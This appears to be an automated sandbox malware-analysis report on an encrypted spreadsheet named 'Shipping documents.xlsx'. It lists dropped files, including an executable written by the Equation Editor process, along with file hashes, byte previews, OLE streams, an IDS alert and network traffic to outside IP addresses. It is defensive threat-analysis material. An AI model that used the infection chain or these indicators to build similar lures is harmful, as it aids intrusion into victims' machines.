                                                                                                                                                                        Entropy (8bit):7.801842363879827
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                                        MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                                        SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                                        SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                                        SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                        Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8B71DA3C.emf
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1099960
                                                                                                                                                                        Entropy (8bit):2.015324823856431
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:mXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:0ahIFdyiaT2qtXw
                                                                                                                                                                        MD5:0579C6F9CBF859BB8D027309ACBD8291
                                                                                                                                                                        SHA1:52DF5DC83F6FF6D305A77B8EA9A442643BA0A1CD
                                                                                                                                                                        SHA-256:F88600367AAC384B1203C2CF056EAB16CE107CFD3D824BF7796DB041D8938481
                                                                                                                                                                        SHA-512:D2B2B2E3DEF0184F5D8ED136B769568980ADB7834923BD220B4517423639780B2E4B04F68409C11743BAD32C8D738D8CF904FB89C69626E73102663836B845F8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview: ....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i........................................................................N.[............p........N.[........ ....yfP........ ............zfP............O...............................X...%...7...................{ .@................C.a.l.i.b.r.................X.......4....2_P........p...p....{]P............dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C197FD0D.jpeg
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                        File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):48770
                                                                                                                                                                        Entropy (8bit):7.801842363879827
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                                        MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                                        SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                                        SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                                        SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                        Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                                        C:\Users\user\Desktop\~$Shipping documents.xlsx
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):330
                                                                                                                                                                        Entropy (8bit):1.4377382811115937
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                                        MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                                        SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                                        SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                                        SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                        C:\Users\Public\vbc.exe
                                                                                                                                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):478720
                                                                                                                                                                        Entropy (8bit):7.699517779790953
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12288:g0b4JO3QrN2iNXxHqSqi+owWODVm4q3ntt8LF:Lb4JO3yN1VxHsphm4wr8
                                                                                                                                                                        MD5:FD09F4D0B2373B9634F2D8AD2F5C899D
                                                                                                                                                                        SHA1:8074CD001665B9CA3FD0392CB74F8525D915A812
                                                                                                                                                                        SHA-256:F592906B568C6138386673B45E8ACBEC69CC736394C29BE98FBB1925A39CF23A
                                                                                                                                                                        SHA-512:B96DAC273A50ED07FC615CBAB935DF508D18EA6084A35D9AC85B580E8B43B2A40354F5B572836E8A438763F92861EDF6B57BFC0DAED8AA655B7785E090DE2513
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j._..............0..D...........b... ........@.. ....................................@.................................<b..O.................................................................................... ............... ..H............text....B... ...D.................. ..`.rsrc................F..............@..@.reloc...............L..............@..B................pb......H........r...c......x...L................................................0..G.........}.....(.......(......s....}.....{.....o.....(......{.....{....o.....*..0...........(.....{....{....(.......(....~....vl....,..{....{....o......{....{.....o....o......{....(....}.....o......3..{....{....o.......+....,@..{....{....o....s......{.....{....{....o......{....{....o......*...{....( ...o!.....{....~....o"....*...{....(#...o!.....{....~....o"....*...0..+.........,..{.......+....,...{.

                                                                                                                                                                        Static File Info

                                                                                                                                                                        General

                                                                                                                                                                        File type:CDFV2 Encrypted
                                                                                                                                                                        Entropy (8bit):7.961115643227587
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                                        File name:Shipping documents.xlsx
                                                                                                                                                                        File size:201728
                                                                                                                                                                        MD5:c3524b3b21dae7ebf0d9ed6b6c10f5ec
                                                                                                                                                                        SHA1:72ebb819703693105a86d206a119f88821c84b54
                                                                                                                                                                        SHA256:aa610173afefde94cf914948a54de1d63b71475cdd0d9bb18e6f01d67a2076a9
                                                                                                                                                                        SHA512:e28890f1f94b1cd647cce3c34cfc6e718133892f358b85dc47555ca2a231dbf1bd3934cbf16d21d6988827e052b604b43d2ddc41e1f7649d7dfb2c4241d53056
                                                                                                                                                                        SSDEEP:6144:EMmGaiwsWbHBOG75ZYNQVtNzhXMcRqity3:EMhAbhOG75ZYOV+cVE
                                                                                                                                                                        File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                        File Icon

                                                                                                                                                                        Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                                        Static OLE Info

                                                                                                                                                                        General

                                                                                                                                                                        Document Type:OLE
                                                                                                                                                                        Number of OLE Files:1

                                                                                                                                                                        OLE File "Shipping documents.xlsx"

                                                                                                                                                                        Indicators

                                                                                                                                                                        Has Summary Info:False
                                                                                                                                                                        Application Name:unknown
                                                                                                                                                                        Encrypted Document:True
                                                                                                                                                                        Contains Word Document Stream:False
                                                                                                                                                                        Contains Workbook/Book Stream:False
                                                                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                                                                        Contains Visio Document Stream:False
                                                                                                                                                                        Contains ObjectPool Stream:
                                                                                                                                                                        Flash Objects Count:
                                                                                                                                                                        Contains VBA Macros:False

                                                                                                                                                                        Streams

                                                                                                                                                                        Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:64
                                                                                                                                                                        Entropy:2.73637206947
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                                        Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                                        Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:112
                                                                                                                                                                        Entropy:2.7597816111
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                                        Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                                        Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:200
                                                                                                                                                                        Entropy:3.13335930328
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                                        Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x6DataSpaces/Version
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:76
                                                                                                                                                                        Entropy:2.79079600998
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                                        Stream Path: EncryptedPackage, File Type: data, Stream Size: 194696
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:EncryptedPackage
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:194696
                                                                                                                                                                        Entropy:7.99819881034
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        Data ASCII:v . . . . . . . . 5 . ; G L . R f d . . . . . . < . . . . . . . . q ~ . . . . | | & . . . . . L x . . . . . . . . 6 . . . . J | T . . < . Q s J . . . b . . . . . . . 8 . . ~ [ . . . b . . . . . . . 8 . . ~ [ . . . b . . . . . . . 8 . . ~ [ . . . b . . . . . . . 8 . . ~ [ . . . b . . . . . . . 8 . . ~ [ . . . b . . . . . . . 8 . . ~ [ . . . b . . . . . . . 8 . . ~ [ . . . b . . . . . . . 8 . . ~ [ . . . b . . . . . . . 8 . . ~ [ . . . b . . . . . . . 8 . . ~ [ . . . b . . . . . . . 8 . . ~ [ . . . b . . . .
                                                                                                                                                                        Data Raw:76 f8 02 00 00 00 00 00 c1 35 0b 3b 47 4c 87 52 66 64 a6 af b6 10 89 fc 3c 12 b8 c5 d3 eb 9a 1d ab 71 7e aa 84 fe 84 7c 7c 26 af ca 00 d3 8c 4c 78 f4 c7 f6 df c0 11 87 ee 36 bf e4 12 09 4a 7c 54 09 83 3c c3 51 73 4a 02 d4 12 62 8a e0 a2 a8 dc b0 8a 38 84 0d 7e 5b 02 d4 12 62 8a e0 a2 a8 dc b0 8a 38 84 0d 7e 5b 02 d4 12 62 8a e0 a2 a8 dc b0 8a 38 84 0d 7e 5b 02 d4 12 62 8a e0 a2 a8
                                                                                                                                                                        Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:EncryptionInfo
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:224
                                                                                                                                                                        Entropy:4.45220077
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . N f . / { h . + . S . . - . . . . Y } v ^ . h . . . . . . . . . . . . . E 2 p ~ . . . . . . . . . . . n . o . . " Y . W . r Q $ j . . .
                                                                                                                                                                        Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                                        Network Behavior

                                                                                                                                                                        Snort IDS Alerts

                                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                        11/26/20-21:14:10.893620TCP1201ATTACK-RESPONSES 403 Forbidden804917023.227.38.74192.168.2.22

                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                        TCP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Nov 26, 2020 21:13:00.120197058 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.238229990 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.238399982 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.238950968 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.358699083 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.358763933 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.358804941 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.358838081 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.358850956 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.358875036 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.358915091 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.358969927 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.477036953 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.477102041 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.477142096 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.477180004 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.477229118 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.477277994 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.477298975 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.477334023 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.477379084 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.477421045 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.477473974 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.477495909 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.477545023 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.595695019 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.595763922 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.595803976 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.595844030 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.595880032 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.595927000 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.595973969 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.595995903 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.596033096 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.596076965 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.596102953 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.596129894 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.596160889 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.596203089 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.596227884 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.596277952 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.596290112 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.596338034 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.596348047 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.596388102 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.596405029 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.596443892 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.596460104 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.596487999 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.596517086 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.596560001 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.596577883 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.596606970 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.597809076 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.714837074 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.714909077 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.714950085 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.714988947 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.715028048 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.715094090 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.715114117 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.715128899 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.715132952 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.715189934 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.715231895 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.715266943 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.715286970 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.715310097 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.715348959 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.715374947 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.715401888 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.715421915 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.715461016 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.715485096 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.715512037 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.715533018 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.715575933 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.715595961 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.715631008 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.715663910 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.715707064 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.715727091 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.715759039 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.715792894 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.715835094 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.715857983 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.715886116 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.715924025 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.715966940 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.715986013 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.716017008 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.716043949 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.716083050 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.716101885 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.716133118 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.716157913 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.716197968 CET8049165216.170.126.121192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:00.716221094 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.716252089 CET4916580192.168.2.22216.170.126.121
                                                                                                                                                                        Nov 26, 2020 21:13:00.716284037 CET8049165216.170.126.121192.168.2.22

                                                                                                                                                                        UDP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Nov 26, 2020 21:13:47.852057934 CET5219753192.168.2.228.8.8.8
                                                                                                                                                                        Nov 26, 2020 21:13:48.040323973 CET53521978.8.8.8192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:54.149552107 CET5309953192.168.2.228.8.8.8
                                                                                                                                                                        Nov 26, 2020 21:13:54.198481083 CET53530998.8.8.8192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:13:59.246659040 CET5283853192.168.2.228.8.8.8
                                                                                                                                                                        Nov 26, 2020 21:13:59.423624992 CET53528388.8.8.8192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:14:05.503380060 CET6120053192.168.2.228.8.8.8
                                                                                                                                                                        Nov 26, 2020 21:14:05.565918922 CET53612008.8.8.8192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:14:10.649647951 CET4954853192.168.2.228.8.8.8
                                                                                                                                                                        Nov 26, 2020 21:14:10.720680952 CET53495488.8.8.8192.168.2.22
